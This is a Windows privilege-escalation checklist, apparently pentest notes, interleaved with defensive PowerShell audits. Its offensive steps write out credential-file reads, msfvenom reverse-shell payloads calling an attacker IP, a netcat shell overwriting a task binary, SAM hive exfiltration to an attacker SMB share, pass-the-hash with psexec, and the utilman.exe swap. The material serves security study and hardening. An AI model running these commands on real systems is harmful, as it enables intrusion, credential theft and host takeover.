# Checklist - Windows

## Unattended install remnants

When installing Windows on a large number of hosts, administrators may use Windows Deployment Services, which allows a single operating system image to be deployed to several hosts over the network. These installations are referred to as unattended installations because they don't require user interaction. They require an administrator account to perform the initial setup, and that account's credentials might end up being stored on the machine in the following locations:

* [ ] C:\Unattend.xml
* [ ] C:\Windows\Panther\Unattend.xml
* [ ] C:\Windows\Panther\Unattend\Unattend.xml
* [ ] C:\Windows\system32\sysprep.inf
* [ ] C:\Windows\system32\sysprep\sysprep.xml
* [ ] C:\inetpub\wwwroot\web.config
* [ ] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
  * [ ] type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr connectionString
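The defender's counterpart to the list above, written for this page as an added example (it is not part of the original checklist): a PowerShell audit that visits every path listed, reports which files still exist, and flags the ones that carry credential material so they can be cleaned up. The file paths are the ones from the list; the regular expressions used to recognise credential material are this example's own assumption.

```powershell
# Added example (not from the original checklist): audit a host for leftover
# unattended-install and config files and flag any that still carry credentials.
# Paths are the ones listed on the page; the regex patterns are an assumption of
# what credential material looks like in those files.
$candidates = @(
    'C:\Unattend.xml',
    'C:\Windows\Panther\Unattend.xml',
    'C:\Windows\Panther\Unattend\Unattend.xml',
    'C:\Windows\system32\sysprep.inf',
    'C:\Windows\system32\sysprep\sysprep.xml',
    'C:\inetpub\wwwroot\web.config',
    'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config'
)

# unattend <Password>/<PlainText> elements, sysprep.inf AdminPassword=, and
# web.config connection strings that embed a password
$patterns = @(
    '<Password>',
    '<PlainText>\s*true',
    'AdminPassword\s*=',
    'connectionString=.*(password|pwd)\s*='
)

function Find-InstallRemnants {
    param([string[]]$Paths = $candidates, [string[]]$Patterns = $patterns)
    foreach ($p in $Paths) {
        if (-not (Test-Path -LiteralPath $p)) { continue }
        $content = Get-Content -LiteralPath $p -Raw -ErrorAction SilentlyContinue
        $hits = @()
        foreach ($re in $Patterns) {
            # -match is case-insensitive by default, which is what we want here
            if ($content -match $re) { $hits += $re }
        }
        [pscustomobject]@{
            Path          = $p
            CredentialHit = ($hits.Count -gt 0)
            Matched       = ($hits -join '; ')
            LastWrite     = (Get-Item -LiteralPath $p).LastWriteTime
        }
    }
}

# Usage: list the remnants, then remove the unattend/sysprep leftovers that still
# hold credentials. web.config belongs to a live application, so it is reported but
# not deleted: rotate the secret it contains instead. -WhatIf keeps this a dry run.
$findings = Find-InstallRemnants
$findings | Format-Table -AutoSize
$findings | Where-Object { $_.CredentialHit -and $_.Path -notmatch 'web\.config$' } |
    ForEach-Object { Remove-Item -LiteralPath $_.Path -Force -WhatIf }
```

Drop `-WhatIf` once the output has been reviewed; the unattend password value is often only base64-encoded rather than encrypted, so a file that merely exists with a `<Password>` element should be treated as a leaked credential and the account's password rotated as well.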

## Installed software registry saved credentials

### Putty

Grab PuTTY saved-session credentials (proxy usernames and passwords are stored in the registry):

* [ ] reg query HKEY\_CURRENT\_USER\Software\SimonTatham\PuTTY\Sessions\ /f "Proxy" /s

## PowerShell + cmd history

Whenever a user runs a command in PowerShell, it is appended to a history file (PSReadLine's ConsoleHost\_history.txt) so that past commands can be recalled quickly. If a user has typed a password directly on the PowerShell command line, it can later be retrieved from this file.

Windows also lets a user run programs under another user's credentials (runas) and offers to save those credentials on the system; cmdkey lists any saved entries.

* [ ] type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost\_history.txt
* [ ] cmdkey /list
  * [ ] runas /savecred /user:victim cmd.exe

## Scheduled Tasks

Looking into scheduled tasks on the target system, you may see a scheduled task that has either lost its binary or is using a binary you can modify.

If our current user can modify or overwrite the "Task to Run" executable, we control what gets executed by the other user, resulting in a simple privilege escalation.

* [ ] schtasks
  * [ ] schtasks /query /tn vulnerable-task /fo list /v
* [ ] icacls C:\tasks-path\vulnerable-task.exe
  * [ ] C:\tmp\nc64.exe -e cmd.exe 4444 > c:\tasks\vulnerable-task.exe
  * [ ] schtasks /run /tn vulnerable-task

## AlwaysInstallElevated

Windows installer files (also known as .msi files) are used to install applications on the system. They usually run with the privilege level of the user that starts them. However, they can be configured to run with higher privileges from any user account (even unprivileged ones). This could potentially allow us to generate a malicious MSI file that would run with admin privileges.

* [ ] reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer
* [ ] reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer
  * [ ] msfvenom -p windows/x64/shell\_reverse\_tcp LHOST=\<attacker-ip> LPORT=6969 -f msi -o malicious.msi #Create malicious .msi
  * [ ] msiexec /quiet /qn /i C:\temp\malicious.msi #Execute the malicious MSI file
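The two registry queries above only tell you the raw values; the policy is only effective when both the HKLM and HKCU values are 1. The following PowerShell, added here as an example and not taken from the original checklist, reads both keys, reports whether the host is actually exposed, and applies the fix. It uses only standard registry-provider cmdlets; the key paths are the ones from the checklist.

```powershell
# Added example (not from the original checklist): check both AlwaysInstallElevated
# policy values and report whether the host is exposed. Exposure requires BOTH the
# HKLM and HKCU values to be 1; a single value set is a warning, not an exposure.
function Get-AlwaysInstallElevatedState {
    $keys = @{
        Machine = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer'
        User    = 'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
    }
    $state = @{}
    foreach ($scope in $keys.Keys) {
        $value = $null
        if (Test-Path $keys[$scope]) {
            # $null when the value does not exist; errors are suppressed on purpose
            $value = (Get-ItemProperty -Path $keys[$scope] -Name AlwaysInstallElevated `
                        -ErrorAction SilentlyContinue).AlwaysInstallElevated
        }
        $state[$scope] = $value
    }
    [pscustomobject]@{
        MachineValue = $state.Machine
        UserValue    = $state.User
        Exposed      = ($state.Machine -eq 1 -and $state.User -eq 1)
    }
}

$result = Get-AlwaysInstallElevatedState
$result

# Remediation (the HKLM half needs an elevated prompt): set both values to 0. For
# domain-joined hosts, enforce "Disabled" through Group Policy instead so the value
# cannot simply be flipped back locally.
if ($result.Exposed) {
    foreach ($hive in 'HKLM:', 'HKCU:') {
        Set-ItemProperty -Path "$hive\SOFTWARE\Policies\Microsoft\Windows\Installer" `
            -Name AlwaysInstallElevated -Value 0 -Type DWord
    }
}
```

The `Exposed` flag is what matters for triage: a host with only the HKCU value set (a common leftover from a user-scope GPO) installs MSI packages with the user's own rights and is not escalatable through this path.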

## Services

Windows services are managed by the **Service Control Manager** (SCM). The SCM is a process in charge of managing the state of services as needed, checking the current status of any given service and generally providing a way to configure services.

Each service on a Windows machine has an associated executable which is run by the SCM whenever the service is started. It is important to note that service executables implement special functions to communicate with the SCM, and therefore not every executable can be started as a service successfully. Each service also specifies the user account under which it will run.

Registry location: HKLM\SYSTEM\CurrentControlSet\Services\\

### Weak permissions

* [ ] Manually check for services and their permissions

```
#CHECK IF ANY SERVICE HAS WEAK PERMISSIONS
#Print details about a service, such as its linked executable
sc qc vulnerable-service
#CHECK LINKED EXECUTABLE PERMISSIONS, HOPEFULLY WE CAN MODIFY (M)
icacls "C:\program files\somecompany\Service.exe"
#IF WE CAN MODIFY AN EXECUTABLE LINKED TO A SERVICE, CREATE A MALICIOUS EXE-SERVICE EXECUTABLE AND UPLOAD IT
msfvenom -p windows/x64/shell_reverse_tcp LHOST= LPORT=6969 -f exe-service -o malicious-svc.exe
#Make a backup of the old service executable, then copy the malicious one to the original location
copy "C:\program files\somecompany\Service.exe" C:\temp\Service.backup
copy C:\temp\malicious-svc.exe "C:\program files\somecompany\Service.exe"
#RESTART SERVICE (if able)
sc stop vulnerable-service
sc start vulnerable-service
```

### Unquoted service paths

```
#CHECK FOR UNQUOTED BINARY_PATH_NAME IN SERVICE
sc qc "some mtg service"
#IF BINARY_PATH_NAME IS NOT DOUBLE-QUOTED, WE MIGHT BE ABLE TO HIJACK, e.g.:
#  BINARY_PATH_NAME : C:\MyPrograms\Magic The Gathering\bin\mtg.exe
#TRY PUTTING A MALICIOUS EXE IN EVERY POSSIBLE LOCATION:
#  C:\MyPrograms\Magic.exe, C:\MyPrograms\Magic The.exe, C:\MyPrograms\Magic The Gathering.exe
```
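Both the scheduled-task weakness (a "Task to Run" binary that is missing or modifiable) and the two service weaknesses just listed (a modifiable service binary, an unquoted path with spaces) come down to one question: can a low-privileged principal write where a privileged process will execute? The PowerShell below, added as an example and not part of the original checklist, answers it across all services and enabled scheduled tasks on the host. The set of principals treated as "low-privileged" and the rights treated as dangerous are this example's assumptions; the cmdlets are standard (`Get-CimInstance Win32_Service`, `Get-ScheduledTask`, `Get-Acl`).

```powershell
# Added example (not from the original checklist): audit scheduled tasks and services
# for a binary that a low-privileged principal can modify (or that is missing from a
# directory they can write to), and for unquoted service paths containing spaces.
# The principal list and the set of dangerous rights are assumptions of this example.
$LowPrivPrincipals = @('Everyone', 'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')
# Write/Modify/FullControl all include WriteData, so these bits cover every "can replace it" case
$DangerousRights = [System.Security.AccessControl.FileSystemRights]'WriteData, AppendData, TakeOwnership, ChangePermissions'

function Test-WritableByLowPriv {
    param([string]$Path)
    if (-not $Path -or -not (Test-Path -LiteralPath $Path)) { return $false }
    $acl = Get-Acl -LiteralPath $Path -ErrorAction SilentlyContinue
    if (-not $acl) { return $false }
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($LowPrivPrincipals -notcontains $ace.IdentityReference.Value) { continue }
        if (([int]$ace.FileSystemRights -band [int]$DangerousRights) -ne 0) { return $true }
    }
    return $false
}

# First token of a service/task command line with env vars expanded; handles quoted paths
function Get-ExePathFromCommand {
    param([string]$Command)
    if (-not $Command) { return $null }
    $c = $Command.Trim()
    if ($c.StartsWith('"')) {
        $end = $c.IndexOf('"', 1)
        if ($end -lt 1) { return $null }
        $exe = $c.Substring(1, $end - 1)
    } elseif ($c -match '^(.*?\.exe)') {
        $exe = $Matches[1]             # unquoted: everything up to the first .exe
    } else {
        $exe = ($c -split '\s+')[0]
    }
    return [Environment]::ExpandEnvironmentVariables($exe)
}

function Test-UnquotedPath {
    param([string]$Command)
    if (-not $Command -or $Command.Trim().StartsWith('"')) { return $false }
    $exe = Get-ExePathFromCommand $Command
    return [bool]($exe -and $exe.Contains(' '))
}

# Shared classification: binary itself writable, or missing from a writable directory?
function Get-BinaryExposure {
    param([string]$Exe)
    $dir = if ($Exe) { Split-Path -Path $Exe -Parent } else { $null }
    $missing = [bool]($Exe -and -not (Test-Path -LiteralPath $Exe))
    $writable = (Test-WritableByLowPriv $Exe) -or ($missing -and $dir -and (Test-WritableByLowPriv $dir))
    [pscustomobject]@{ Missing = $missing; Writable = [bool]$writable }
}

function Get-ServiceFindings {
    Get-CimInstance Win32_Service | ForEach-Object {
        $exe = Get-ExePathFromCommand $_.PathName
        $exp = Get-BinaryExposure $exe
        $unquoted = Test-UnquotedPath $_.PathName
        if ($unquoted -or $exp.Writable) {
            [pscustomobject]@{ Kind = 'Service'; Name = $_.Name; RunsAs = $_.StartName
                Command = $_.PathName; Unquoted = $unquoted; Writable = $exp.Writable; Missing = $exp.Missing }
        }
    }
}

function Get-TaskFindings {
    Get-ScheduledTask | Where-Object { $_.State -ne 'Disabled' } | ForEach-Object {
        $task = $_
        foreach ($action in $task.Actions) {
            if (-not $action.Execute) { continue }      # COM-handler actions have no Execute
            $exe = [Environment]::ExpandEnvironmentVariables($action.Execute.Trim('"'))
            if (-not [System.IO.Path]::IsPathRooted($exe)) { continue }   # PATH-resolved names are not judged here
            $exp = Get-BinaryExposure $exe
            if ($exp.Writable) {
                [pscustomobject]@{ Kind = 'Task'; Name = ($task.TaskPath + $task.TaskName); RunsAs = $task.Principal.UserId
                    Command = "$($action.Execute) $($action.Arguments)".Trim(); Unquoted = $false; Writable = $true; Missing = $exp.Missing }
            }
        }
    }
}

# Usage: run from an elevated prompt so every task definition and ACL is readable
@(Get-ServiceFindings) + @(Get-TaskFindings) |
    Format-Table Kind, Name, RunsAs, Unquoted, Writable, Missing, Command -AutoSize
```

Every row is a finding to fix, not just to note: quote the service path (`sc config <name> binPath= "\"C:\full path\svc.exe\""`), and restore the binary's ACL so that only Administrators and SYSTEM hold Modify. The `RunsAs` column tells you how bad a given row is; a task or service running as SYSTEM or as a domain account is the one to fix first.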

## Token privileges

```
#check current privileges
whoami /priv
```

### SeBackup / SeRestore

```
#WITH SUCH PRIVS WE CAN DUMP REGISTRY/CREDS
#Dump Registry hives for local analysis
reg save hklm\system C:\Users\victim\system.hive
reg save hklm\sam C:\Users\victim\sam.hive

#Start a local SMB server on the attacker machine to transfer files, then copy them over from the victim
#attacker:
python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support -username victim -password victimpassword public share
#victim:
copy C:\Users\victim\system.hive \\attacker-ip\public\
copy C:\Users\victim\sam.hive \\attacker-ip\public\

#Parse the hives
python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -sam sam.hive -system system.hive LOCAL

#IF SUCCESSFUL DUMP, start cracking it and pass-the-hash
#Try psexec
python3 /usr/share/doc/python3-impacket/examples/psexec.py -hashes aad3h73h:1238d8 Administrator@<target-ip>
```

### SeTakeOwnership

```
#WITH SUCH PRIVS WE CAN TAKE OWNERSHIP OF ANY OBJECT (FILES, REGKEYS, ETC)
#A nice trick is to replace a system file such as utilman.exe, which can be launched from the login screen
takeown /f C:\Windows\System32\Utilman.exe
#OWNING A FILE DOES NOT MEAN HAVING PRIVILEGES ON IT, BUT WE CAN ADD SAID PRIVS AFTER OWNING
icacls C:\Windows\System32\Utilman.exe /grant our-current-user:F
#NOW THAT WE HAVE OWNERSHIP+PRIVS, LET'S REPLACE IT WITH A MALICIOUS EXE OR JUST A CMD
copy C:\Windows\System32\cmd.exe C:\Windows\System32\utilman.exe
#YOU CAN NOW LOCK OR RESTART AND OPEN THE EASE-OF-ACCESS MENU TO GET A SHELL
```
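The utilman.exe swap leaves a distinctive trail: the file's owner changes from TrustedInstaller to the user who ran takeown, the Microsoft signature no longer verifies, the version resource names a different original file, and the bytes match cmd.exe. The PowerShell below, added here as an example and not part of the original checklist, checks all four. The choice of indicators is this example's own; the cmdlets (`Get-Acl`, `Get-AuthenticodeSignature`, `Get-FileHash`) are standard.

```powershell
# Added example (not from the original checklist): detect the utilman.exe replacement
# described above. A genuine System32 accessibility binary is owned by TrustedInstaller,
# carries a valid Microsoft signature, names itself in its version resource and is not
# a copy of cmd.exe. The default list is the binary named on the page; others can be
# passed in the same way.
function Test-AccessibilityBinary {
    param([string[]]$Names = @('utilman.exe'))
    $sys32   = Join-Path $env:SystemRoot 'System32'
    $cmdHash = (Get-FileHash -LiteralPath (Join-Path $sys32 'cmd.exe') -Algorithm SHA256).Hash
    foreach ($n in $Names) {
        $path = Join-Path $sys32 $n
        if (-not (Test-Path -LiteralPath $path)) { continue }
        $owner = (Get-Acl -LiteralPath $path).Owner
        $sig   = Get-AuthenticodeSignature -FilePath $path      # catalog signatures count as Valid
        $hash  = (Get-FileHash -LiteralPath $path -Algorithm SHA256).Hash
        $orig  = (Get-Item -LiteralPath $path).VersionInfo.OriginalFilename
        $ownerOk  = ($owner -eq 'NT SERVICE\TrustedInstaller')
        $signerOk = ($sig.Status -eq 'Valid' -and $sig.SignerCertificate.Subject -like '*Microsoft*')
        $nameOk   = [bool]($orig -and (($orig -replace '\0', '').Trim() -ieq $n))
        $isCmd    = ($hash -eq $cmdHash)
        [pscustomobject]@{
            File       = $n
            Owner      = $owner
            Signature  = $sig.Status
            OrigName   = $orig
            IsCmdCopy  = $isCmd
            Suspicious = [bool](-not $ownerOk -or -not $signerOk -or -not $nameOk -or $isCmd)
        }
    }
}

# Usage: run on a schedule from a detection job and alert on Suspicious = True
Test-AccessibilityBinary | Format-List
```

Ownership is the cheapest of the four signals to monitor continuously: a successful `takeown` on anything under System32 by a non-administrator account is itself the event to alert on, before the file is ever replaced.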

### SeImpersonate / SeAssignPrimaryToken

* Reference: <https://decoder.cloud/2019/12/06/we-thought-they-were-potatoes-but-they-were-beans/>
* Tool: <https://github.com/antonioCoco/RogueWinRM>
